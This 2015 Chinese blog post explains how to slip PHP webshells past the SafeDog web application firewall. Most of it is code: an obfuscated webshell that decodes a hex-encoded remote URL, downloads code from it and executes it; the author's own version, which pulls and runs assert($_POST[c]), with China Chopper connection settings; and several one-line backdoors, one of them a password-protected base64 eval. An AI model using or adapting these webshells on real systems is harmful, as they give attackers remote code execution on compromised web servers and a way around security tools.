27 April 2015

研究了一下过狗原理,自己写了个一句话。

过狗php大马一枚,有人翻译如下,省了我不少事。

<?php 
define('iphp','oday');
define('T','H*');
define('A','call');
define('B','user');
define('C','func');
define('D','create');
define('E','function');
define('F','file');
define('F1','get');
define('F2','contents');
define('P','pack');
$p = P;  //pack
$call = sprintf('%s_%s_%s',A,B,C); //call_user_func
$create = sprintf('%s_%s',D,E);    //create_function
$file = sprintf('%s_%s_%s',F,F1,F2); //file_get_contents 远程文件读取
$t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5');
//$call($create(null,$p(T,$file($p(T,join(null,$t))))));
call_user_func(create_function(null,pack('H*',file_get_contents(pack('H*',join(null,$t))))));
?>
写了两个脚本webshell.php和getcode.php(本地开了个php server,运行getcode.php模拟远程服务器上的网页)
原理:首先用菜刀访问webshell.php,该webshell立即从远程服务器上获取要运行的代码并执行。
这里获取的代码是61737365727428245f504f53545b635d293b,也就是assert($_POST[c]);
菜刀中设置:http://192.168.1.102/DebugPHP/webshell.php 密码是c

两个脚本代码如下:

<?php 
//webshell.php
//echo pack('H*', base_convert('0011000000111010', 2, 16));
//echo pack('H*', '61737365727428245f504f53545b635d293b');
//call_user_func(create_function(null,'echo (1+2);'));
//call_user_func(create_function(null,'assert($_POST[c]);'));

$url='http://localhost/DebugPHP/getcode.php?call=code';
call_user_func(create_function(null,pack('H*',file_get_contents($url))));
?>

<?php
//getcode.php    
//assert($_POST[c]);
$cmd=$_GET['call'];
if ($cmd=='code')  
   echo sprintf('61737365727428245f504f53545b635d293b');
?>

其他一句话:

<?php $x=base64_decode("YXNzZXJ0");$x($_POST['c']);?>
<?php call_user_func(create_function(null,'assert($_POST[c]);'));?>

//口令是: door
<?php eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw));?>

php函数参考网站: create_function pack



blog comments powered by Disqus